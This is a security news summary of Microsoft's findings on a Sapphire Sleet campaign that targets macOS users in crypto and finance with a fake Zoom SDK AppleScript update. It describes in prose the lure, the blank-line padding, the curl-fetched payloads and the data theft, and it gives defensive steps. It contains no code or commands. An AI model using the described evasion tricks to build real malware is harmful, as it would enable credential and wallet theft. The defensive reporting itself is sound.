π―Imagine you're tricked into thinking you're downloading a safe update for your Zoom app, but instead, you're actually giving hackers access to your passwords and cryptocurrency. This is what the Sapphire Sleet group is doing, and it's a reminder to always be careful about what you download.
What Happened
Microsoft Threat Intelligence has uncovered a new campaign by the North Korean threat actor Sapphire Sleet, which targets macOS users through social engineering rather than exploiting software vulnerabilities. The campaign involves tricking users into executing a malicious file disguised as a Zoom SDK update, allowing the attackers to steal sensitive information such as passwords, cryptocurrency assets, and personal data. This approach highlights the importance of user awareness and layered security defenses.
Who's Affected
Sapphire Sleet primarily targets individuals and organizations in the cryptocurrency, finance, venture capital, and blockchain sectors. The campaign's reliance on social engineering makes it particularly dangerous, as it preys on users' trust and familiarity with legitimate software updates.
How It Works
The attack begins with Sapphire Sleet impersonating a job recruiter on professional networking platforms, building rapport with potential victims before directing them to download a file named "Zoom SDK Update.scpt." When opened, this AppleScript file executes within the trusted macOS Script Editor, which raises no security flags. The script is designed to appear benign, containing thousands of blank lines to obscure the malicious code.
Once executed, the malware invokes the legitimate macOS softwareupdate binary with an invalid parameter, mimicking a real system process. It then uses curl commands to fetch additional malicious payloads, leading to a multi-stage attack that collects sensitive information and registers the compromised device with Sapphire Sleet's command-and-control servers.
What's at Risk
The malware is capable of harvesting a wide range of sensitive data, including login credentials, cryptocurrency wallet keys, Telegram session data, and SSH keys. All stolen data is compressed and uploaded silently to attacker-controlled servers over port 8443. The attack circumvents macOS security layers such as Gatekeeper and Transparency, Consent, and Control (TCC) by shifting execution into a user-initiated context, which allows the malware to operate undetected.
Patch Status
In response to the discovery of this campaign, Apple has implemented XProtect signature updates and enhanced Safe Browsing protections in Safari to detect and block the infrastructure associated with Sapphire Sleet. Users are encouraged to keep their macOS devices updated to ensure these protections remain active.
Immediate Actions
To protect against this type of attack, users should:
Do Now
- 1.Be cautious of unsolicited requests to run terminal commands during online interactions, especially in job interviews.
- 2.Block compiled AppleScript (.scpt) files from being executed without verification.
Do Next
- 3.Audit LaunchDaemon plist files for any unexpected entries that could indicate malware persistence.
- 4.Monitor the TCC database for unauthorized changes, which could signal a compromise.
Conclusion
The Sapphire Sleet campaign serves as a stark reminder of the evolving tactics used by cybercriminals. By relying on social engineering and user interaction, these attackers can bypass traditional security measures, making it essential for users and organizations to remain vigilant and informed about potential threats.
The Sapphire Sleet campaign underscores the critical need for user awareness and robust security measures, as attackers increasingly exploit human behavior rather than technical vulnerabilities.
